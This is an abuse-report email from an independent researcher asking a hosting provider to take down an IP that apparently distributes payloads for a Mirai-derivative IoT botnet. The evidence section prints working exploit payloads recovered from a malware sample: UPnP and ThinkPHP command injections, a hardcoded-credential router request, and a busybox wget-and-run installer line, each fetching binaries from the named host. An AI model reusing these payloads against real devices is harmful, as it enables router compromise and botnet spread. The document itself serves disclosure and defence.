Eonix 173 232 146 173 Uirusu C2

To: net-abuse@eonix.net Cc: abuse@nuclide-research.com Subject: Eonix customer 173.232.146.173 (rDNS zknotes.com) hosting Uirusu/2.0 IoT botnet C2 + payload distribution, takedown request

Nicholas Michael Kloster / NuClide Research nicholas@nuclide-research.com

2026-05-07

Re: Eonix customer host serving as IoT botnet C2 / payload distribution IP: 173.232.146.173 (rDNS zknotes.com) Severity: HIGH

I’m an independent security researcher conducting good-faith AI infrastructure research under the NuClide Research umbrella (CISA disclosures CVE-2025-4364, ICSA-25-140-11). This is an unsolicited C2-takedown request.

The host 173.232.146.173 (Eonix EONIX netblock, rDNS zknotes.com) is the active payload-distribution server for a Uirusu/2.0 IoT botnet (Mirai-derivative). The host serves arch-specific payloads at standard botnet paths (/bins/x86, /mips, /8UsA.sh shell installer) and is referenced as the propagation target by an in-the-wild sample recovered from a confirmed victim host.

Evidence

NuClide recovered a malware sample (vcimanagement.x64, SHA256 38dce395aa82fea8b4ea00de17e14f3b7db9a5ebb28e82529ed66aa2b0f44eb0, 784,152 bytes ELF64 statically-linked) from a Tencent Cloud Beijing victim host (101.34.81.166, separately disclosed to abuse@tencent.com on 2026-05-06).

Static analysis of the sample reveals:

1. UPnP SOAP exploit module targeting Huawei HG532 routers (CVE-2017-17215 class):

<u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
  <NewStatusURL>$(/bin/busybox wget -g 173.232.146.173 -l /tmp/binary -r /mips;
                  /bin/busybox chmod 777 * /tmp/binary;
                  /tmp/binary mips)</NewStatusURL>
  <NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>
</u:Upgrade>

2. Huawei HG532 admin RCE (hardcoded Digest auth):

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway",
   nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", ...

3. ThinkPHP exploit (CVE-2018-20062):

GET /index.php?s=/index/think/app/invokefunction&function=call_user_func_array
&vars[0]=shell_exec&vars[1][]='wget http://173.232.146.173/bins/x86 -O thonkphp;
   chmod 777 thonkphp; ./thonkphp ThinkPHP; rm -rf thinkphp' HTTP/1.1
User-Agent: Uirusu/2.0

4. MVPower DVR RCE:

POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 192.168.0.14:80
User-Agent: python-requests/2.20.0

5. Generic shell-installer drop:

/bin/busybox wget http://173.232.146.173/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

The User-Agent string Uirusu/2.0 (“uirusu” = Japanese for “virus” / ウイルス) is the botnet author’s signature and distinguishes this campaign from other Hilix-class samples.

Distinct from prior C2 disclosure

A parallel disclosure was sent yesterday (2026-05-06) to abuse@akamai.com + abuse@linode.com for a DIFFERENT botnet C2 at 172.233.96.208:3053 (Linode US, used by a Hilix-classic variant, different sample, different filename pattern, different User-Agent rotation, but same general Mirai-derivative family). Both samples were recovered from the same victim host (which had been compromised by both campaigns sequentially).

Action requested

Verify whether 173.232.146.173 is currently serving the listed paths (/bins/x86, /mips, /8UsA.sh) and, if so, request termination / null-route of the customer / removal of the malicious payloads.

The host’s rDNS zknotes.com may be a compromised legitimate customer (the name pattern fits a notes / blog domain) rather than the botnet operator’s primary infrastructure. Customer-direct outreach (rather than termination) may be appropriate if they’re an unwitting victim.

IOCs

Reference

Full multi-victim case study (Hilix-classic + Uirusu/2.0 cross-attribution): AI-LLM-Infrastructure-OSINT/blob/main/case-studies/commercial/multi-hilix-jupyter-campaign-2026-05-06.md

Sample is available on request via secure-share link / VirusTotal / MalwareBazaar.

Regards, Nicholas Michael Kloster / NuClide Research nicholas@nuclide-research.com AI-LLM-Infrastructure-OSINT